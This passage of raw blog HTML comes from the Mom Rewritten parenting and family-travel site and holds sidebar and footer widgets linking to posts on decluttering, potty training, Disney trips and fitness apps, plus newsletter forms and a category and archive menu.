https://www.momrewritten.com/wp-content/uploads/2019/01/IMG_5987-768x512.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2019/01/IMG_5987.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/sick-day-activities-for-adults/">Sick Day Activities for Adults</a></h2></header></article><article class="post-12560 post type-post status-publish format-standard has-post-thumbnail category-living-simply-momrewritten category-this-life category-uncategorized entry"><a href="https://www.momrewritten.com/easy-decluttering-tips-clean-house/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="300" height="187" src="https://www.momrewritten.com/wp-content/uploads/2019/01/declutter-collectin-FEATURE-300x187.jpg" class="entry-image attachment-post" alt="Looking for the best way to declutter, get organized and clean your home? These are easy decluttering tips with FREE printables to keep you on task! Find out how to declutter your desk, organize your kitchen, clear out kid stuff and have the cleanest bathroom. No need to get overwhelmed with housework with the practical advice and printable for daily housekeeping!" srcset="https://www.momrewritten.com/wp-content/uploads/2019/01/declutter-collectin-FEATURE-300x187.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2019/01/declutter-collectin-FEATURE-768x479.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2019/01/declutter-collectin-FEATURE-800x500.jpg 800w, https://www.momrewritten.com/wp-content/uploads/2019/01/declutter-collectin-FEATURE.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/easy-decluttering-tips-clean-house/">Easy Decluttering Tips To Organize and Clean Up the House</a></h2></header></article><p class="more-from-category"><a href="https://www.momrewritten.com/this-life/" title="This Life">More Posts from This Life</a></p></div></section> <section id="featured-post-8" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">MOM LIFE</h4> <article class="post-13350 post type-post status-publish format-standard has-post-thumbnail category-little-changes-big-difference-momrewritten category-mom-life-momrewritten tag-exercise tag-fitness tag-health entry"><a href="https://www.momrewritten.com/gixo-review-fitness-app/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="300" height="169" src="https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-300x169.jpg" class="entry-image attachment-post" alt="Busy parents looking for at-home workouts should consider this budget-friendly smart phone app. Read this beginner&#039;s guide to using Gixo for both on demand and live exercise classes with a coach, the pros and cons of the fitness app and who would benefit the most. Find out which classes are offered including HIIT, yoga, 5K &amp; 10K marathon training and more." srcset="https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-300x169.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-768x432.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-1030x579.jpg 1030w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-320x180.jpg 320w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-480x270.jpg 480w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-720x405.jpg 720w, https://www.momrewritten.com/wp-content/uploads/2019/04/fitness-1348867_1920-735x413.jpg 735w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/gixo-review-fitness-app/">Gixo Beginner&#8217;s Guide &#8211; Is Gixo the Best Workout App for Busy Moms?</a></h2></header></article><article class="post-12762 post type-post status-publish format-standard has-post-thumbnail category-little-changes-big-difference-momrewritten category-mom-life-momrewritten category-uncategorized entry"><a href="https://www.momrewritten.com/confidence-boosters-reason-to-smile/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="300" height="254" src="https://www.momrewritten.com/wp-content/uploads/2019/02/Colgate-getting-kissed-300x254.jpg" class="entry-image attachment-post" alt="" srcset="https://www.momrewritten.com/wp-content/uploads/2019/02/Colgate-getting-kissed-300x254.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2019/02/Colgate-getting-kissed.jpg 717w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/confidence-boosters-reason-to-smile/">Confidence Boosters Give Me a Reason to Smile</a></h2></header></article><article class="post-8673 post type-post status-publish format-standard has-post-thumbnail category-mom-life-momrewritten category-positive-parenting-momrewritten entry"><a href="https://www.momrewritten.com/potty-training-in-three-days/" class="alignnone" aria-hidden="true" tabindex="-1"><img width="300" height="225" src="https://www.momrewritten.com/wp-content/uploads/2019/03/potty-image-for-pin-300x225.jpg" class="entry-image attachment-post" alt="You might have heard about the potty training in three day method and wonder if it would work with your toddler? These are the must-read toilet training tips for kids including how to prep your child, prepare your family &amp; FREE printables, including a printable sticker chart. These are the potty tips you&#039;ll need for success!" srcset="https://www.momrewritten.com/wp-content/uploads/2019/03/potty-image-for-pin-300x225.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2019/03/potty-image-for-pin-768x576.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2019/03/potty-image-for-pin-1030x773.jpg 1030w, https://www.momrewritten.com/wp-content/uploads/2019/03/potty-image-for-pin-320x240.jpg 320w, https://www.momrewritten.com/wp-content/uploads/2019/03/potty-image-for-pin-480x360.jpg 480w, https://www.momrewritten.com/wp-content/uploads/2019/03/potty-image-for-pin-720x540.jpg 720w, https://www.momrewritten.com/wp-content/uploads/2019/03/potty-image-for-pin-735x551.jpg 735w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/potty-training-in-three-days/">Potty Training in Three Days? &#8211; Practical Potty Training Tips for Toddlers</a></h2></header></article><p class="more-from-category"><a href="https://www.momrewritten.com/mom-life-momrewritten/" title="Mom Life">More Posts from mom life</a></p></div></section> <section id="featured-post-9" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">OTHER POSTS YOU MIGHT LIKE</h4> <article class="post-5914 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-tips-tricks category-featured tag-clothing tag-disney tag-disneyland-3 tag-kids tag-outfits tag-vacation tag-walt-disney-world entry"><a href="https://www.momrewritten.com/best-disney-outfits-for-kids/" class="aligncenter" aria-hidden="true" tabindex="-1"><img width="300" height="200" src="https://www.momrewritten.com/wp-content/uploads/2016/04/header-tshirt-300x200.jpg" class="entry-image attachment-post" alt="" srcset="https://www.momrewritten.com/wp-content/uploads/2016/04/header-tshirt-300x200.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2016/04/header-tshirt-768x512.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2016/04/header-tshirt-1030x687.jpg 1030w, https://www.momrewritten.com/wp-content/uploads/2016/04/header-tshirt.jpg 1500w, https://www.momrewritten.com/wp-content/uploads/2016/04/header-tshirt-705x470.jpg 705w, https://www.momrewritten.com/wp-content/uploads/2016/04/header-tshirt-450x300.jpg 450w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/best-disney-outfits-for-kids/">What to Wear in the Parks &#8211; Best Disney Outfits for Kids</a></h2></header></article><article class="post-11224 post type-post status-publish format-standard has-post-thumbnail category-featured category-southern-california-travel-momrewritten category-travel-momrewritten category-uncategorized tag-california tag-palm-springs tag-travel-2 entry"><a href="https://www.momrewritten.com/8-things-to-do-in-palm-springs-with-kids-of-all-ages/" class="aligncenter" aria-hidden="true" tabindex="-1"><img width="300" height="200" src="https://www.momrewritten.com/wp-content/uploads/2018/06/Palm-springs-lead-300x200.jpg" class="entry-image attachment-post" alt="There are lots of things to families to do in Palm Spring. Find out the top 8 desert adventures including golfing, museums, and water parks. Lots of tips on where to stay and what to do in the California desert with kids of all ages." srcset="https://www.momrewritten.com/wp-content/uploads/2018/06/Palm-springs-lead-300x200.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2018/06/Palm-springs-lead-768x512.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2018/06/Palm-springs-lead-1030x687.jpg 1030w, https://www.momrewritten.com/wp-content/uploads/2018/06/Palm-springs-lead-1500x1000.jpg 1500w, https://www.momrewritten.com/wp-content/uploads/2018/06/Palm-springs-lead-705x470.jpg 705w, https://www.momrewritten.com/wp-content/uploads/2018/06/Palm-springs-lead-450x300.jpg 450w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/8-things-to-do-in-palm-springs-with-kids-of-all-ages/">8 Things to Do in Palm Springs with Kids of All Ages</a></h2></header></article><article class="post-10052 post type-post status-publish format-standard has-post-thumbnail category-featured category-kid-life-momrewritten category-kids-love-momrewritten category-uncategorized tag-kids tag-positive-parenting tag-surprise entry"><a href="https://www.momrewritten.com/surprise-your-kids/" class="aligncenter" aria-hidden="true" tabindex="-1"><img width="300" height="200" src="https://www.momrewritten.com/wp-content/uploads/2018/06/Costume-Farm-300x200.jpg" class="entry-image attachment-post" alt="Is surprising your kids ever a good idea? These are the tips for how to plan a perfect surprise, what to do if a surprise goes wrong and 16 sweet surprises for kids!" srcset="https://www.momrewritten.com/wp-content/uploads/2018/06/Costume-Farm-300x200.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2018/06/Costume-Farm-768x512.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2018/06/Costume-Farm-1030x687.jpg 1030w, https://www.momrewritten.com/wp-content/uploads/2018/06/Costume-Farm-1500x1000.jpg 1500w, https://www.momrewritten.com/wp-content/uploads/2018/06/Costume-Farm-705x470.jpg 705w, https://www.momrewritten.com/wp-content/uploads/2018/06/Costume-Farm-450x300.jpg 450w" sizes="(max-width: 300px) 100vw, 300px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/surprise-your-kids/">16 Ways to Surprise Your Kids (and Tips for When a Surprise Goes Bad)</a></h2></header></article></div></section> </div></div></main><aside class="sidebar sidebar-primary widget-area" role="complementary" aria-label="Primary Sidebar"><section id="media_image-12" class="widget widget_media_image"><div class="widget-wrap"><div style="width: 6026px" class="wp-caption alignnone"><a href="https://www.adamandclaudiaphotography.com/referral-mom-rewritten"><img width="6016" height="4016" src="https://www.momrewritten.com/wp-content/uploads/2019/05/AWEsome-DCA-1074.jpg" class="image wp-image-13581 aligncenter attachment-full size-full" alt="" style="max-width: 100%; height: auto;" srcset="https://www.momrewritten.com/wp-content/uploads/2019/05/AWEsome-DCA-1074.jpg 6016w, https://www.momrewritten.com/wp-content/uploads/2019/05/AWEsome-DCA-1074-300x200.jpg 300w, https://www.momrewritten.com/wp-content/uploads/2019/05/AWEsome-DCA-1074-768x513.jpg 768w, https://www.momrewritten.com/wp-content/uploads/2019/05/AWEsome-DCA-1074-1030x688.jpg 1030w, https://www.momrewritten.com/wp-content/uploads/2019/05/AWEsome-DCA-1074-735x491.jpg 735w" sizes="(max-width: 6016px) 100vw, 6016px" /></a><p class="wp-caption-text">Photo Credit: A&amp;C Photography</p></div></div></section> <section id="simple-social-icons-3" class="widget simple-social-icons"><div class="widget-wrap"><ul class="aligncenter"><li class="ssi-facebook"><a href="https://www.facebook.com/momrewritten/" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-facebook" aria-labelledby="social-facebook-3"><title id="social-facebook-3">Facebook</title><use xlink:href="https://www.momrewritten.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-facebook"></use></svg></a></li><li class="ssi-gplus"><a href="https://plus.google.com/u/0/+JulieBigboy" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-gplus" aria-labelledby="social-gplus-3"><title id="social-gplus-3">Google+</title><use xlink:href="https://www.momrewritten.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-gplus"></use></svg></a></li><li class="ssi-instagram"><a href="https://www.instagram.com/momrewritten/" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-instagram" aria-labelledby="social-instagram-3"><title id="social-instagram-3">Instagram</title><use xlink:href="https://www.momrewritten.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-instagram"></use></svg></a></li><li class="ssi-pinterest"><a href="https://www.pinterest.com/momrewritten" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-pinterest" aria-labelledby="social-pinterest-3"><title id="social-pinterest-3">Pinterest</title><use xlink:href="https://www.momrewritten.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-pinterest"></use></svg></a></li><li class="ssi-twitter"><a href="http://twitter.com/momrewritten" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-twitter" aria-labelledby="social-twitter-3"><title id="social-twitter-3">Twitter</title><use xlink:href="https://www.momrewritten.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-twitter"></use></svg></a></li></ul></div></section> <section id="media_image-13" class="widget widget_media_image"><div class="widget-wrap"><img width="300" height="250" src="https://www.momrewritten.com/wp-content/uploads/2017/07/Greeting-Mom-Rewritten-Blog-Logo.png" class="image wp-image-8359 aligncenter attachment-full size-full" alt="" style="max-width: 100%; height: auto;" /></div></section> <section id="search-4" class="widget widget_search"><div class="widget-wrap"><form class="search-form" method="get" action="https://www.momrewritten.com/" role="search"><input class="search-form-input" type="search" name="s" id="searchform-5cdd6ed3f28cf8.31952757" placeholder="Looking for something?"><input class="search-form-submit" type="submit" value="Search"><meta content="https://www.momrewritten.com/?s={s}"></form></div></section> <section id="enews-ext-3" class="widget enews-widget"><div class="widget-wrap"><div class="enews"><h4 class="widget-title widgettitle">STAY UPDATED!</h4> <p>Stay Updated! Receive the Mom Rewritten newsletter.</p> <form id="subscribeenews-ext-3" action="https://savingupfordisney.us10.list-manage.com/subscribe/post?u=ad3343c01b7d84a8310d1e05a&amp;id=3221cb996b" method="post" target="_blank" onsubmit="if ( subbox1.value == 'First Name') { subbox1.value = ''; } if ( subbox2.value == 'Last Name') { subbox2.value = ''; }" name="enews-ext-3"> <label for="subbox1" class="screenread">First Name</label><input type="text" id="subbox1" class="enews-subbox" value="" placeholder="First Name" name="FNAME" /> <label for="subbox" class="screenread">E-Mail Address</label><input type="email" value="" id="subbox" placeholder="E-Mail Address" name="EMAIL" required="required" /> <input type="submit" value="Go" id="subbutton" /> </form> </div></div></section> <section id="featured-post-1" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">MOST POPULAR</h4> <article class="post-9264 post type-post status-publish format-standard has-post-thumbnail category-featured category-kid-life-momrewritten category-kids-love-momrewritten category-uncategorized entry"><a href="https://www.momrewritten.com/gift-guide-best-books-for-kids/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="150" height="150" src="https://www.momrewritten.com/wp-content/uploads/2017/10/kid-2603859_1280-150x150.jpg" class="entry-image attachment-post" alt="" srcset="https://www.momrewritten.com/wp-content/uploads/2017/10/kid-2603859_1280-150x150.jpg 150w, https://www.momrewritten.com/wp-content/uploads/2017/10/kid-2603859_1280-400x400.jpg 400w, https://www.momrewritten.com/wp-content/uploads/2017/10/kid-2603859_1280-125x125.jpg 125w, https://www.momrewritten.com/wp-content/uploads/2017/10/kid-2603859_1280-80x80.jpg 80w, https://www.momrewritten.com/wp-content/uploads/2017/10/kid-2603859_1280-36x36.jpg 36w, https://www.momrewritten.com/wp-content/uploads/2017/10/kid-2603859_1280-180x180.jpg 180w, https://www.momrewritten.com/wp-content/uploads/2017/10/kid-2603859_1280-120x120.jpg 120w, https://www.momrewritten.com/wp-content/uploads/2017/10/kid-2603859_1280-450x450.jpg 450w" sizes="(max-width: 150px) 100vw, 150px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/gift-guide-best-books-for-kids/">Gift Guide &#8211; 100 Best Books for Kids of All Ages</a></h2></header></article><article class="post-7622 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-tips-tricks category-featured category-uncategorized tag-magic-kingdom tag-toddlers tag-walt-disney-world entry"><a href="https://www.momrewritten.com/walt-disney-world-guide-toddlers-at-magic-kingdom/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="150" height="150" src="https://www.momrewritten.com/wp-content/uploads/2017/04/magic-kingdom-toddler-lantern-150x150.jpg" class="entry-image attachment-post" alt="" srcset="https://www.momrewritten.com/wp-content/uploads/2017/04/magic-kingdom-toddler-lantern-150x150.jpg 150w, https://www.momrewritten.com/wp-content/uploads/2017/04/magic-kingdom-toddler-lantern-400x400.jpg 400w, https://www.momrewritten.com/wp-content/uploads/2017/04/magic-kingdom-toddler-lantern-125x125.jpg 125w, https://www.momrewritten.com/wp-content/uploads/2017/04/magic-kingdom-toddler-lantern-80x80.jpg 80w, https://www.momrewritten.com/wp-content/uploads/2017/04/magic-kingdom-toddler-lantern-36x36.jpg 36w, https://www.momrewritten.com/wp-content/uploads/2017/04/magic-kingdom-toddler-lantern-180x180.jpg 180w, https://www.momrewritten.com/wp-content/uploads/2017/04/magic-kingdom-toddler-lantern-120x120.jpg 120w, https://www.momrewritten.com/wp-content/uploads/2017/04/magic-kingdom-toddler-lantern-450x450.jpg 450w" sizes="(max-width: 150px) 100vw, 150px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/walt-disney-world-guide-toddlers-at-magic-kingdom/">Walt Disney World Guide for Toddlers at Magic Kingdom</a></h2></header></article><article class="post-1733 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-tips-tricks category-featured tag-disney tag-disneyland-3 tag-walt-disney-world entry"><a href="https://www.momrewritten.com/waiting-in-line-at-disney/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="150" height="150" src="https://www.momrewritten.com/wp-content/uploads/2016/08/line-150x150.jpg" class="entry-image attachment-post" alt="Waiting in line at Disney can&#039;t always be avoided but here are 12 constructive ways to spend the time in queue that will entertain and occupy your family (lots of ideas for keeping toddlers and kids busy in line at Disney parks!)" srcset="https://www.momrewritten.com/wp-content/uploads/2016/08/line-150x150.jpg 150w, https://www.momrewritten.com/wp-content/uploads/2016/08/line-400x400.jpg 400w, https://www.momrewritten.com/wp-content/uploads/2016/08/line-125x125.jpg 125w, https://www.momrewritten.com/wp-content/uploads/2016/08/line-80x80.jpg 80w, https://www.momrewritten.com/wp-content/uploads/2016/08/line-36x36.jpg 36w, https://www.momrewritten.com/wp-content/uploads/2016/08/line-180x180.jpg 180w, https://www.momrewritten.com/wp-content/uploads/2016/08/line-120x120.jpg 120w, https://www.momrewritten.com/wp-content/uploads/2016/08/line-450x450.jpg 450w" sizes="(max-width: 150px) 100vw, 150px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/waiting-in-line-at-disney/">12 Things to Do Waiting in Line at Disney Parks</a></h2></header></article></div></section> <section id="custom_html-6" class="widget_text widget widget_custom_html"><div class="widget_text widget-wrap"><div class="textwidget custom-html-widget"><!-- START ADVERTISER: Dinnerly (US) from awin.com --> <a href="https://www.awin1.com/cread.php?s=1030612&v=10033&q=318201&r=302301"> <img src="https://www.awin1.com/cshow.php?s=1030612&v=10033&q=318201&r=302301" border="0"> </a> <!-- END ADVERTISER: Dinnerly (US) from awin.com --> </div></div></section> <section id="media_image-14" class="widget widget_media_image"><div class="widget-wrap"><a href="https://www.getawaytoday.com/?referrerid=7529"><img width="80" height="300" src="https://www.momrewritten.com/wp-content/uploads/2019/05/Star-Wars-Galaxys-Edge-side-bar-banner-80x300.jpg" class="image wp-image-13614 attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="https://www.momrewritten.com/wp-content/uploads/2019/05/Star-Wars-Galaxys-Edge-side-bar-banner-80x300.jpg 80w, https://www.momrewritten.com/wp-content/uploads/2019/05/Star-Wars-Galaxys-Edge-side-bar-banner.jpg 160w" sizes="(max-width: 80px) 100vw, 80px" /></a></div></section> <div class="sidebar-split-left"></div><!-- end #sidebar-split-left--><div class="sidebar-split-right"></div><!-- end #sidebar-split-right--><div class="sidebar-split-bottom"></div><!-- end #sidebar-split-bottom--></aside></div></div></div><div class="footer-widgets"><div class="wrap"><div class="widget-area footer-widgets-1 footer-widget-area"><section id="enews-ext-2" class="widget enews-widget"><div class="widget-wrap"><div class="enews"><h4 class="widget-title widgettitle">GET THE LATEST</h4> <p>Stay Updated! Receive the Mom Rewritten newsletter</p> <form id="subscribeenews-ext-2" action="https://savingupfordisney.us10.list-manage.com/subscribe/post?u=ad3343c01b7d84a8310d1e05a&amp;id=3221cb996b" method="post" target="_blank" onsubmit="if ( subbox1.value == 'First Name') { subbox1.value = ''; } if ( subbox2.value == 'Last Name') { subbox2.value = ''; }" name="enews-ext-2"> <label for="subbox1" class="screenread">First Name</label><input type="text" id="subbox1" class="enews-subbox" value="" placeholder="First Name" name="FNAME" /> <label for="subbox" class="screenread">E-Mail Address</label><input type="email" value="" id="subbox" placeholder="E-Mail Address" name="EMAIL" required="required" /> <input type="submit" value="Go" id="subbutton" /> </form> </div></div></section> </div><div class="widget-area footer-widgets-2 footer-widget-area"><section id="featured-post-10" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">FEATURED</h4> <article class="post-7361 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-tips-tricks tag-budget tag-disney-with-kids tag-disneyland-3 tag-splurges entry"><a href="https://www.momrewritten.com/disneyland-splurges-kids-cut-costs/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="150" height="150" src="https://www.momrewritten.com/wp-content/uploads/2017/02/mouseears-150x150.jpg" class="entry-image attachment-post" alt="Disneyland Splurges for Kids (and Money-Saving Splurges You MUST make!)" srcset="https://www.momrewritten.com/wp-content/uploads/2017/02/mouseears-150x150.jpg 150w, https://www.momrewritten.com/wp-content/uploads/2017/02/mouseears-80x80.jpg 80w, https://www.momrewritten.com/wp-content/uploads/2017/02/mouseears-400x400.jpg 400w, https://www.momrewritten.com/wp-content/uploads/2017/02/mouseears-125x125.jpg 125w" sizes="(max-width: 150px) 100vw, 150px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/disneyland-splurges-kids-cut-costs/">Disneyland Splurges for Kids (and Where to Cut Costs)</a></h2></header><div class="entry-content"><p>Disneyland splurges can really ... <div class="read-more"><a class="more-link" href="https://www.momrewritten.com/disneyland-splurges-kids-cut-costs/">read more...</a></div></p></div></article><article class="post-3506 post type-post status-publish format-standard has-post-thumbnail category-disney category-disneyland-tips-tricks tag-california-adventure tag-crowd tag-disneyland-3 entry"><a href="https://www.momrewritten.com/crowdeddisneyland/" class="alignleft" aria-hidden="true" tabindex="-1"><img width="150" height="150" src="https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-150x150.jpg" class="entry-image attachment-post" alt="" srcset="https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-150x150.jpg 150w, https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-80x80.jpg 80w, https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-400x400.jpg 400w, https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-125x125.jpg 125w, https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-200x200.jpg 200w, https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-320x320.jpg 320w, https://www.momrewritten.com/wp-content/uploads/2015/04/Crowds-in-New-Orleans-Sq-480x480.jpg 480w" sizes="(max-width: 150px) 100vw, 150px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.momrewritten.com/crowdeddisneyland/">Crowded Disneyland Day? Top Tips on What to Do!</a></h2></header><div class="entry-content"><p>Disney Parks are very popular ... <div class="read-more"><a class="more-link" href="https://www.momrewritten.com/crowdeddisneyland/">read more...</a></div></p></div></article></div></section> </div><div class="widget-area footer-widgets-3 footer-widget-area"><section id="simple-social-icons-2" class="widget simple-social-icons"><div class="widget-wrap"><h4 class="widget-title widgettitle">Connect with me</h4> <ul class="aligncenter"><li class="ssi-facebook"><a href="https://www.facebook.com/momrewritten/" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-facebook" aria-labelledby="social-facebook-2"><title id="social-facebook-2">Facebook</title><use xlink:href="https://www.momrewritten.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-facebook"></use></svg></a></li><li class="ssi-gplus"><a href="https://plus.google.com/u/0/+JulieBigboy" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-gplus" aria-labelledby="social-gplus-2"><title id="social-gplus-2">Google+</title><use xlink:href="https://www.momrewritten.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-gplus"></use></svg></a></li><li class="ssi-instagram"><a href="https://www.instagram.com/momrewritten/" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-instagram" aria-labelledby="social-instagram-2"><title id="social-instagram-2">Instagram</title><use xlink:href="https://www.momrewritten.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-instagram"></use></svg></a></li><li class="ssi-pinterest"><a href="https://www.pinterest.com/momrewritten" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-pinterest" aria-labelledby="social-pinterest-2"><title id="social-pinterest-2">Pinterest</title><use xlink:href="https://www.momrewritten.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-pinterest"></use></svg></a></li><li class="ssi-twitter"><a href="http://twitter.com/momrewritten" target="_blank" rel="noopener noreferrer"><svg role="img" class="social-twitter" aria-labelledby="social-twitter-2"><title id="social-twitter-2">Twitter</title><use xlink:href="https://www.momrewritten.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-twitter"></use></svg></a></li></ul></div></section> <section id="categories-3" class="widget widget_categories"><div class="widget-wrap"><h4 class="widget-title widgettitle">CATEGORIES</h4> <form action="https://www.momrewritten.com" method="get"><label class="screen-reader-text" for="cat">CATEGORIES</label><select name='cat' id='cat' class='postform' > <option value='-1'>Select Category</option> <option class="level-0" value="26">Christmas at Disneyland</option> <option class="level-0" value="690">Crafts and Activities for Kids</option> <option class="level-0" value="4">Disney</option> <option class="level-0" value="5">Disney &#8211; Food &amp; Dining</option> <option class="level-0" value="7">Disney &#8211; Memories</option> <option class="level-0" value="8">Disney &#8211; Resort Hotels</option> <option class="level-0" value="10">Disney Parks &#8211; Tips &amp; Tricks</option> <option class="level-0" value="6">Disneyland &#8211; Holidays</option> <option class="level-0" value="9">Disneyland &#8211; Special Needs</option> <option class="level-0" value="693">Family Travel</option> <option class="level-0" value="769">Featured</option> <option class="level-0" value="15">Halloweentime at Disneyland</option> <option class="level-0" value="687">Kid Life</option> <option class="level-0" value="683">Littles Changes for a Big Difference</option> <option class="level-0" value="694">Living Simply</option> <option class="level-0" value="682">Mom Life</option> <option class="level-0" value="691">Parties and Fun Stuff</option> <option class="level-0" value="685">Positive Parenting</option> <option class="level-0" value="686">Projects and Crafts for Mom</option> <option class="level-0" value="698">Recipes and Eating</option> <option class="level-0" value="692">SoCal Destinations</option> <option class="level-0" value="689">Things Kids Love</option> <option class="level-0" value="21">This Life</option> <option class="level-0" value="19">Travel</option> <option class="level-0" value="1">Uncategorized</option> </select> </form> <script type='text/javascript'> /* <![CDATA[ */ (function() { var dropdown = document.getElementById( "cat" ); function onCatChange() { if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) { dropdown.parentNode.submit(); } } dropdown.onchange = onCatChange; })(); /* ]]> */ </script> </div></section> <section id="archives-5" class="widget widget_archive"><div class="widget-wrap"><h4 class="widget-title widgettitle">ARCHIVES</h4> <label class="screen-reader-text" for="archives-dropdown-5">ARCHIVES</label> <select id="archives-dropdown-5" name="archive-dropdown"> <option value="">Select Month</option> <option value='https://www.momrewritten.com/2019/05/'> May 2019 </option> <option value='https://www.momrewritten.com/2019/04/'> April 2019 </option> <option value='https://www.momrewritten.com/2019/03/'> March 2019 </option> <option value='https://www.momrewritten.com/2019/02/'> February 2019 </option> <option value='https://www.momrewritten.com/2019/01/'> January 2019 </option> <option value='https://www.momrewritten.com/2018/12/'> December 2018 </option> <option value='https://www.momrewritten.com/2018/11/'> November 2018 </option> <option value='https://www.momrewritten.com/2018/10/'> October 2018 </option> <option value='https://www.momrewritten.com/2018/09/'> September 2018 </option> <option value='https://www.momrewritten.com/2018/08/'> August 2018 </option> <option value='https://www.momrewritten.com/2018/07/'> July 2018 </option> <option value='https://www.momrewritten.com/2018/06/'> June 2018 </option> <option value='https://www.momrewritten.com/2018/05/'> May 2018 </option> <option value='https://www.momrewritten.com/2018/04/'> April 2018 </option> <option value='https://www.momrewritten.com/2018/03/'> March 2018 </option> <option value='https://www.momrewritten.com/2018/02/'> February 2018 </option> <option value='https://www.momrewritten.com/2018/01/'> January 2018 </option> <option value='https://www.momrewritten.com/2017/12/'> December 2017 </option> <option value='https://www.momrewritten.com/2017/11/'> November 2017 </option> <option value='https://www.momrewritten.com/2017/10/'> October 2017 </option> <option value='https://www.momrewritten.com/2017/09/'> September 2017 </option> <option value='https://www.momrewritten.com/2017/08/'> August 2017 </option> <option value='https://www.momrewritten.com/2017/07/'> July 2017 </option> <option value='https://www.momrewritten.com/2017/06/'> June 2017 </option> <option value='https://www.momrewritten.com/2017/05/'> May 2017 </option> <option value='https://www.momrewritten.com/2017/04/'> April 2017 </option> <option value='https://www.momrewritten.com/2017/03/'> March 2017 </option> <option value='https://www.momrewritten.com/2017/02/'> February 2017 </option> <option value='https://www.momrewritten.com/2017/01/'> January 2017 </option> <option value='https://www.momrewritten.com/2016/12/'> December 2016 </option> <option value='https://www.momrewritten.com/2016/11/'> November 2016 </option> <option value='https://www.momrewritten.com/2016/10/'> October 2016 </option> <option value='https://www.momrewritten.com/2016/09/'> September 2016 </option> <option value='https://www.momrewritten.com/2016/08/'> August 2016 </option> <option value='https://www.momrewritten.com/2016/07/'> July 2016 </option> <option value='https://www.momrewritten.com/2016/06/'> June 